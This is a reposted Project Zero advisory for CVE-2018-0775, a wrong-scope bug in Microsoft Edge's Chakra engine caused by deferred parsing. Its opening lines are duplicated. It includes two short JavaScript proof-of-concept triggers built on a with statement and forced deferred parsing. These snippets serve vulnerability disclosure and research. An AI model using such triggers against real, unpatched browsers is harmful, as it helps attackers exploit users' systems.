Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2
CVE-2018-0775
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a w Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2
CVE-2018-0775
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to <a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"> issue 1310 </a>.
PoC:
// Enable the flag using '
'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '
'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
Microsoft Edge Chakra Deferred Parsing
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 401